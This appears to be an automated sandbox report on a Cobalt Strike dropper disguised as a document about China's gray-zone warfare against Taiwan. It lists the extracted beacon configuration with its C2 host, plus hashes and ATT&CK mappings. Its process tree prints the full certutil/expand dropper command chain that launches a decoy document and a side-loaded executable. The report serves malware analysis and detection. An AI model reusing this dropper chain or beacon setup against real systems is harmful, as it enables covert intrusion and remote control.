Analysis

  • max time kernel
    144s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
  • submitted
    12-01-2024 11:04

General

  • Target

    China's_gray-zone_warfare_against_Taiwan/__MACOS/_params.cat.js

  • Size

    1.4MB

  • MD5

    83be472a5402d0b32e40cc6d761a8a37

  • SHA1

    e44732160aae29881342dfde89db0fe9aa984f7f

  • SHA256

    434517ef2e12af66ef97b740e4caf9b07a73f1321bf013b6ee6dd0d180804409

  • SHA512

    0c490221d52f7460608cb85be047aa36337ca5c1e6b0de39b870ef41dab23a96eef36e05a400e1848c6136e9d34f4c3f1a72dd390c80798d9bb3148cf3271c0d

  • SSDEEP

    24576:lWGkPK8x3nD7v6hfaMk4HY7rlho/S28f2HCQbuNc0W1w/HiELEVZ7110Yy36ht6Y:/

Malware Config

Extracted

Family

cobaltstrike

Botnet

100000000

C2

http://upserver.updateservice.store:443/common.html

Attributes
  • access_type

    512

  • beacon_type

    2048

  • host

    upserver.updateservice.store,/common.html

  • http_header1


  • http_header2

    AAAAEAAAACJIb3N0OiB1cHNlcnZlci51cGRhdGVzZXJ2aWNlLnN0b3JlAAAACgAAABFDb25uZWN0aW9uOiBjbG9zZQAAAAoAAAAvQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQAAAAHAAAAAQAAAAMAAAADAAAAAgAAAAhhdXRob3JzPQAAAAQAAAAHAAAAAAAAAAMAAAACAAAADl9fc2Vzc2lvbl9faWQ9AAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=

  • http_method1

    GET

  • http_method2

    POST

  • jitter

    9472

  • polling_time

    58666

  • port_number

    443

  • sc_process32

    %windir%\syswow64\svchost.exe

  • sc_process64

    %windir%\sysnative\svchost.exe

  • state_machine

    MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCdQ5nVpJ13O9CwiQRtLOdTAwGg6oj4mvtVqZvCbSy9YyU3ngZSDBgmWjSMwrTqMvvKUr5RvigK1N00xTGT4LVtDESUaUvyGU79G24yPaF5rUOJjnAIRazosjB87DvXbI6k45HQsVyZD7wgEXnKFmv3E0Tk9ti5G0eVOKL5tqdS5QIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • unknown1

    6.1158912e+08

  • unknown2

    AAAABAAAAAIAAAJYAAAAAwAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

  • uri

    /r-arrow

  • user_agent

    Mozilla/5.0 (Windows Phone 10.0; Android 6.0.1; Microsoft; RM-1152) AppleWebKit/537.36 (KHTML, like Gecko)

  • watermark

    100000000

Signatures

  • Cobaltstrike

    Detected malicious payload which is part of Cobaltstrike.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\China's_gray-zone_warfare_against_Taiwan\__MACOS\_params.cat.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2024
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c findstr 4d534346 C:\Users\Admin\AppData\Roaming\lFbRwJ.tmp > C:\Users\Admin\AppData\Roaming\sxytyM.tmp&for /r c:\windows\system32\ %i in (*ertu*.exe) do %i -decodehex C:\Users\Admin\AppData\Roaming\sxytyM.tmp C:\Users\Admin\AppData\Roaming\SfnLzw.tmp&expand -F:* C:\Users\Admin\AppData\Roaming\SfnLzw.tmp C:\Users\Admin\AppData\Roaming\&start C:\Users\Admin\AppData\Roaming\China's_gray-zone_warfare_against_Taiwan.doc&start C:\Users\Admin\AppData\Roaming\360se.exe&del C:\Users\Admin\AppData\Roaming\lFbRwJ.tmp C:\Users\Admin\AppData\Roaming\sxytyM.tmp C:\Users\Admin\AppData\Roaming\SfnLzw.tmp
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2796
      • C:\Windows\system32\findstr.exe
        findstr 4d534346 C:\Users\Admin\AppData\Roaming\lFbRwJ.tmp
        3⤵
          PID:2156
        • \??\c:\windows\system32\certutil.exe
          c:\windows\system32\certutil.exe -decodehex C:\Users\Admin\AppData\Roaming\sxytyM.tmp C:\Users\Admin\AppData\Roaming\SfnLzw.tmp
          3⤵
            PID:2688
          • C:\Windows\system32\expand.exe
            expand -F:* C:\Users\Admin\AppData\Roaming\SfnLzw.tmp C:\Users\Admin\AppData\Roaming\
            3⤵
            • Drops file in Windows directory
            PID:2760
          • C:\Users\Admin\AppData\Roaming\360se.exe
            C:\Users\Admin\AppData\Roaming\360se.exe
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            PID:2756
          • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
            "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\China's_gray-zone_warfare_against_Taiwan.doc"
            3⤵
            • Drops file in Windows directory
            • Modifies Internet Explorer settings
            • Modifies registry class
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2732
            • C:\Windows\splwow64.exe
              C:\Windows\splwow64.exe 12288
              4⤵
                PID:1648

Network

MITRE ATT&CK Matrix (ATT&CK v13)

  • Defense Evasion (1): Modify Registry, T1112
  • Discovery (1): System Information Discovery, T1082

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
    Filesize: 20KB
    MD5: dbcea5869bfc256f9220db9a7d04c4e9
    SHA1: 7d029086ccf3a44bfd3ac955cbaa1dae099d8014
    SHA256: 8be008a9a9257fe2248ac86ebb566b5ba3c7d85cfc8484f6209a69cb22369e1e
    SHA512: 639b4d43d92bc46c45d25816f571b916f0021ff8a82cc153d12098ac646e78b49d424eea0f8db2965e501e7663e1c9ac075d9916579eeabb3084f17ae3b1f82e

  • C:\Users\Admin\AppData\Roaming\lFbRwJ.tmp
    Filesize: 768KB
    MD5: 3a5d8b6cd9ed9eaaf2a4eca6ececf614
    SHA1: f2405f13c88ee9c734fa35f776427923c8cfc90e
    SHA256: 4702d44f416fea9a92e9f299f7ec30c56524ae3281dbb3c5abd723ec6cbc075d
    SHA512: 23fc2d78c4c1bbdad6194a8132f5dfe184db5a4a0a2b9b2ec5bd3193dc5414ac2db6a5156dfb80377477588c7797f1cdda25d29c20c017523a6387e3bccfa65d

  • C:\Users\Admin\AppData\Roaming\sxytyM.tmp
    Filesize: 112KB
    MD5: 0c1585a525705f9f103c88726d13c210
    SHA1: 3ed0e06658dfd522fa49dccbf6b6decae435ff76
    SHA256: 751ae2969d8d26f75ac67ae577418140a6d2c0830134b53e87ef3b5367673abc
    SHA512: 392f6379e237aa420640fceeea18a78a78766fa03574cf2f6c6421a16149edb618431c9a85e0a09672911e2a3e27d3b02d84bb828fb70a5f3918497a848974c5

  • \??\c:\users\admin\appdata\roaming\sfnlzw.tmp
    MD5: d41d8cd98f00b204e9800998ecf8427e
    SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
    SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
    SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • memory/2732-46-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize: 64KB

  • memory/2732-47-0x000000007144D000-0x0000000071458000-memory.dmp
    Filesize: 44KB

  • memory/2732-40-0x000000002F281000-0x000000002F282000-memory.dmp
    Filesize: 4KB

  • memory/2732-78-0x000000007144D000-0x0000000071458000-memory.dmp
    Filesize: 44KB

  • memory/2732-95-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize: 64KB

  • memory/2756-67-0x00000000002E0000-0x0000000000368000-memory.dmp
    Filesize: 544KB

  • memory/2756-66-0x00000000000F0000-0x0000000000124000-memory.dmp
    Filesize: 208KB

  • memory/2756-68-0x00000000002E0000-0x0000000000368000-memory.dmp
    Filesize: 544KB